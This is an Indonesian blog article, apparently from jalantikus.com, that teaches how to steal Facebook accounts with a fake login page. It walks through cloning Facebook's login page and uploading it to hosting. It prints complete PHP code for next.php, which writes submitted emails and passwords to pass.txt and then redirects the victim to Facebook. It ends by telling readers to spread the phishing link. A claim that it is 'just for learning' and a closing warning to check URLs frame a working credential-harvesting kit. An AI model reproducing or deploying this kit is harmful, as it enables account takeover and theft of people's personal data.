Hot!

Cara Hack Akun Facebook dengan Membuat Login Palsu



jalantikus.com Sejak pertama kali membuat Facebook, sudah berapa banyak informasi atau foto yang kamu posting di sana? Mungkin kamu lupa bahwa setiap data yang kamu bagikan bisa saja tidak aman.
Banyak cara yang dilakukan orang tidak bertanggung jawab untuk mencuri data di Facebook.
Salah satunya adalah dengan membuat halaman login palsu. Agar kamu tidak tertipu, yuk pelajari cara membuat login Facebook palsu!

Bahaya Login Palsu

Dengan membuat tampilan login Facebook palsu, hacker akan mengalihkan data yang kamu input ke hosting file milik mereka. Di sana data email dan password Facebook kamu akan tersimpan, sehingga mereka bisa masuk dengan mudah.
cara hack akun facebook
Setelah paham bahayanya, yuk pahami cara membuatnya! Tapi ingat, cara hack akun Facebook dengan login palsu yang akan dibagikan ini hanya untuk belajar saja ya.

Cara Hack Akun Facebook dengan Login Palsu

Adapun cara membuat tampilan login Facebook palsu untuk mencuri data Facebook orang lain adalah sebagai berikut:
buka-halaman-login-facebook-lalu-simpan
  • Pada hasil downloadnya akan ada file Masuk Facebook _ Facebook.html dan folder Masuk Facebook _ Facebook_files. Silakan timpa file Masuk Facebook _ Facebook_files dengan file serupa yang telah diperbarui. Download filenya di sini.
download-file-halaman-login-facebook-palsu
  • Langkah selanjutnya adalah membuat file next.php. Silakan copy paste code di bawah di Notepad atau aplikasi text editor lainnya. Lalu simpan dengan nama next.php.
Salin SemuaSalin
  1. <?php
  2. header('Location: http://www.Facebook.com/login.php');
  3. $handle = fopen('pass.txt', 'a');
  4. foreach($_GET as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, '=');
  7. fwrite($handle, $value);
  8. fwrite($handle, '\n');
  9. }
  10. fwrite($handle, '\n');
  11. fclose($handle);
  12. exit;
  13. ?>
  • Jangan lupa, buat juga file kosong dengan Notepad, lalu beri nama Pass.txt. File ini berguna untuk menampung email dan password Facebook orang lain nantinya.
buat-file-pass-txt
  • Setelah semua file siap, tugasmu adalah mengupload semua file tadi ke layanan file hosting milikmu. Adapun isi file yang harus diupload adalah folder Masuk Facebook _ Facebook_files, file Masuk Facebook _ Facebook.html yang kamu download, next.php dan Pass.text.
upload-semua-file-ke-hosting
  • Selesai. Tinggal sebarkan deh link login Facebook palsu yang telah kamu buat tadi.
halaman-login-facebook-palsu
  • Jika ada yang kena login palsu, maka email dan password mereka akan muncul di halaman Pass.txt yang kamu buat.
isi-email-dan-password
Mudah bukan? Hanya bermodal file hosting, hacker akan mendapatkan semua data kamu jika tidak berhati-hati. Maka dari itu, jangan sekali-kali sembarangan login apa pun tanpa memperhatikan alamat URL-nya ya. Bahaya! Semoga bermanfaat.